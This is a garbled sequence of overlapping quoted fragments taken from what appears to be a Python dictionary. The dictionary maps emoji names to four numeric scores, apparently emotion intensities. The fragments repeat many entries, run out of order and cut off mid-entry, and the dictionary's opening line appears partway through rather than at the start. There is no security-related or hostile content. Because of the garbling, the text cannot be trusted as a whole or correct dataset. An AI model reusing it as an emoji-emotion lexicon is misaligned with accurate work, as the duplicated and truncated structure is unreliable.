0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\":", "0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42,", "[0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265,", "0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327],", "[0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998,", "0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\":", "0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032,", "[0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15,", "\":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096,", "0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136,", "[0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001,", "0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196,", "\":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179,", "\":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15,", "[0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043,", "0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493,", "0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151,", "0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136,", "0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251,", "0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\":", "0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266],", "\":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064,", "\":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998,", "0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075,", "\":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142,", "0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285],", "0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159,", "0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\":", "\":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999,", "0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\":", "0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128],", "0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263],", "0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095],", "[0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214,", "0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268,", "\":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213,", "[0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429,", "0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\":", "[0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111,", "[0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002,", "0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\":", "[0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003,", "[0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147,", "0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\":", "\":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203,", "[0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27,", "0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203,", "0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273],", "0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\":", "0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\":", "0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245],", "0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087],", "\":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997,", "\":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998,", "\":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998,", "0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198,", "[0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998,", "0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\":", "0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292],", "0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\":", "0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182],", "\":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001,", "0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\":", "[0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003,", "0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998],", "0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\":", "\":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359,", "[0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136,", "0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\":", "0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\":", "0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\":", "[0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209,", "0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003,", "0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\":", "0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251],", "\":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155,", "sadness emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196,", "0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\":", "\":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251,", "0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134,", "\":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24,", "0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998],", "[0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062,", "[0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003,", "0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998,", "[0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002,", "\":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142,", "0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213,", "[0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237,", "\":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191,", "0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\":", "[0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145,", "[0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141,", "0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\":", "0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153],", "0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187,", "[0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254,", "0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\":", "\":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157,", "0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\":", "0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121],", "\":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419,", "0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\":", "0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004],", "\":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253,", "[0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301,", "\":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397,", "0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001],", "0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\":", "\":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225,", "[0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129,", "0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002],", "\":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267,", "0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\":", "0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\":", "[0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051,", "[0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998,", "\":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14,", "\":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004,", "0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22,", "\":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131,", "0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319],", "0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\":", "0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\":", "0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\":", "0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129],", "0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\":", "0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\":", "\":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998,", "[0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092,", "[0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312,", "\":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327,", "\":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002,", "0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\":", "\":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094,", "[0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149,", "0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998,", "\":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187,", "\":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271,", "0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3],", "0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301,", "0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145,", "[0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264,", "[0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188,", "0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09],", "\":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147,", "[0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1,", "\":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259,", "0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261,", "[0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256,", "0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\":", "\":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209,", "0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002,", "\":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284,", "0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\":", "0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\":", "\":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159,", "[0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276,", "0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331,", "0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997],", "[0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": 